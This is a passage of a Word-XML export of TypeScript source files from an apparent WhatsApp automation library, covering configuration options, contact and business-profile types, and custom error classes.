        <w:t xml:space="preserve">     * Some features (e.g [[sendLinkWithAutoPreview]])  **do not** work with multi-device beta. Check [this `api`](#).</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multiDevice?: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Base64 encoded S3 Bucket &amp; Authentication object for session data files. The object should be in the same format as cloudUploadOptions.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sessionDataBucketAuth?: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automatic emoji detection character. Set this to `false` to disable auto emoji. Default is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autoEmoji?: string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maximum amount of chats to be present in a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maxChats?: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 the maximum amount of messages to be present in a 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maxMessages?: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Your Discord ID to get onto the sticker leaderboard!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discord?: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Don't implicitly determine if the host logged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ignoreNuke?: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Makes sure the headless session is usable even on first login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * Headful sessions are ususally only usable on reauthentication.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ensureHeadfulIntegrity?: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wait for a valid headful session. Not required in recent versions.</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waitForRipeSession?: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Automatically kill the process after a set amount of qr codes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qrMax?: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Expose a URL where you can easily scan the qr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ezqr?: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[winston](https://github.com/winstonjs/winston/blob/master/docs/transports.md#additional-transports) logging transport configurations.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[Check this discussion to see how to set up logging](https://github.com/open-wa/wa-automate-nodejs/discussions/2373)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logging?: ConfigLogTransport[]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your instance of [serverless meta grabber](https://github.com/RemiixInc/meta-grabber-serverless) by [RemiixInc](https://github.com/RemiixInc).</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`https://link.openwa.cloud/api`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linkParser?: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run `gc()` on before every command sent to the browser.</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experimental and may not work or it may have unforeseen sideeffects.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aggressiveGarbageCollection?: boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    /**@internal */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    [x: string]: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AdvancedConfig = ConfigObject &amp; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    licenseKey: LicenseKeyConfig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Re-exports from @open-wa/config for gradual migration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New Zod-based configuration types from @open-wa/config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * These provide runtime validation and better TypeScript support.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import { ConfigSchema, Config } from '@open-wa/core';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 Validate config at runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * const validatedConfig = ConfigSchema.parse(userConfig);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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ConfigSchema as ZodConfigSchema,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    type Config as ZodConfig,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    type PartialConfig as ZodPartialConfig,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    parseConfig,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    validateConfig,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    getDefaultConfig,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">} from '@open-wa/config';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/legacy-documented/src/api/model/config.ts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packages/legacy-documented/src/api/model/contact.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ContactId } from './aliases';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Id } from './id';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Message } from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NumberCheck {</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status: 200 | 404,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    isBusiness: boolean,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    canReceiveMessage: boolean,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    numberExists: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BizCategory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localized_display_name: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BizProfileOptions {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  commerceExperience: "catalog" | "none" | "shop"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  cartEnabled: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BusinessHours {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  config: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    [day in "mon" | "tue" | "wed" | "thu" | "fri" | "sat" | "sun"]: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      mode: "specific_hours" | "open_24h" | "appointment_only"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      hours: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timezone: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BusinessProfile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ID of the business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special string that identifies the business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tag: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business description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business' categories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categories: BizCategory[]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business' profile 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profileOptions: BizProfileOptions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business' email address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email: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Array of strings that represent the business' websites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website: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operating hours of the business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businessHours: BusinessHours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status of the business' catalog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catalogStatus: "catalog_exists"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address of the business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address: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facebook page of the business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fbPage: any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instagram profile of the business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igProfessional: any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isProfileLinked: boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  coverPhoto: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cover photo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cover photo. It might download as an .enc but just change the extension to .jpg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latitude of the business location if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latitude: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longitude of the business location if set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longitude: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Contact {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  formattedName: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  id: ContactId;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isBusiness: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Most likely true when the account has a green tick. See `verifiedLevel` also.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isEnterprise: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isMe: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isMyContact: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isPSA: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isUser: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isWAContact: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  labels: string[];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  msgs: Message[];</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plaintextDisabled: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  profilePicThumbObj: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    eurl: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    id: Id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    img: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    imgFull: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    raw: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    tag: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pushname: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  shortName: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  statusMute: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  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0 = not verified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   * 2 = verified (most likely represents a blue tick)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verifiedLevel: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business account name verified by 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verifiedName: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isOnline?: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  lastSeen?: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contact is a business, the business information will be added to the contact object.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In some circumstances this will be out of date or lacking certain fields. In those cases you have to use `client.getBusinessProfile`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businessProfile?: BusinessProfile;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packages/legacy-documented/src/api/model/contact.ts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packages/legacy-documented/src/api/model/errors.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export class PageEvaluationTimeout extends Error {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    constructor(...args) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        super(...args);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (Error.captureStackTrace) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            Error.captureStackTrace(this, PageEvaluationTimeout);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this.name = 'PageEvaluationTimeout';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.message =</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            'The method call was timed out but it may have been successfull in the WA session. It is just no longer holding up the process';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class SessionExpiredError extends Error {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      super("This session has been deauthenticated!"); // (1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.name = "SessionExpiredError"; // (2)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Enum of error names specific to this library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ERROR_NAME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sticker file exceeds the maximum 1MB limit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STICKER_TOO_LARGE = "STICKER_TOO_LARGE",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expected URL is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MISSING_URL = "MISSING_URL",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puppeteer page has been closed or the client has lost the connection with the page. This can happen if your computer/server has gone to sleep and waken up. Please restart your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PAGE_CLOSED = "PAGE_CLOSED",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client state is preventing the command from completing.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STATE_ERROR = "STATE_ERROR",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is not a media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NOT_MEDIA = "NOT_MEDIA",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Expected media is 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MEDIA_MISSING = "MEDIA_MISSING",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attempt to decrypt a sticker message has failed.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STICKER_NOT_DECRYPTED = "STICKER_NOT_DECRYPTED",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File was not found at given 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FILE_NOT_FOUND = "FILE_NOT_FOUND",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sticker metadata parameter is wrong.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BAD_STICKER_METADATA = "BAD_STICKER_METADATA",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Unable to send text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SENDTEXT_FAILURE = "SENDTEXT_FAILURE",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Label does not exist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INVALID_LABEL = 'INVALID_LABEL'</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simple custom error class that takes the first parameter as the name using the [[ERROR_NAME]]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class CustomError extends Error {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  constructor(name:ERROR_NAME, message?: string, ...params : any[])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message,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      ...params])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.name = name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.message =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Add Participants Status Code Enum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AddParticipantErrorStatusCode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Participant could not be added to group because they are already in the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ALREADY_IN_GROUP = 409,</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Participant could not be added to group because their privacy settings do not allow you to add them.</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PRIVACY_SETTINGS = 403,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Participant could not be added to group because they recently left.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RECENTLY_LEFT = 408,</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Participant could not be added to group because the group is full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GROUP_FULL = 500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export class AddParticipantError extends Error {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  data: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    [contactId : string]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constructor(message : string, data ?: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    [contactId: string]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super();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.name = "ADD_PARTICIPANTS_ERROR";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.message = message;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.data = 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packages/legacy-documented/src/api/model/errors.ts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packages/legacy-documented/src/api/model/events.pseudo.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/model/events.ts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`packages/legacy/src/api/model/events.ts`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`SimpleListener`, the canonical list of one-callback event hooks supported by the legacy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`events.ts:5-124` — `SimpleListener` enum maps friendly event categories to the actual client method names such as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onMessage`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onAnyMessage`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onAck`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onChatState`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
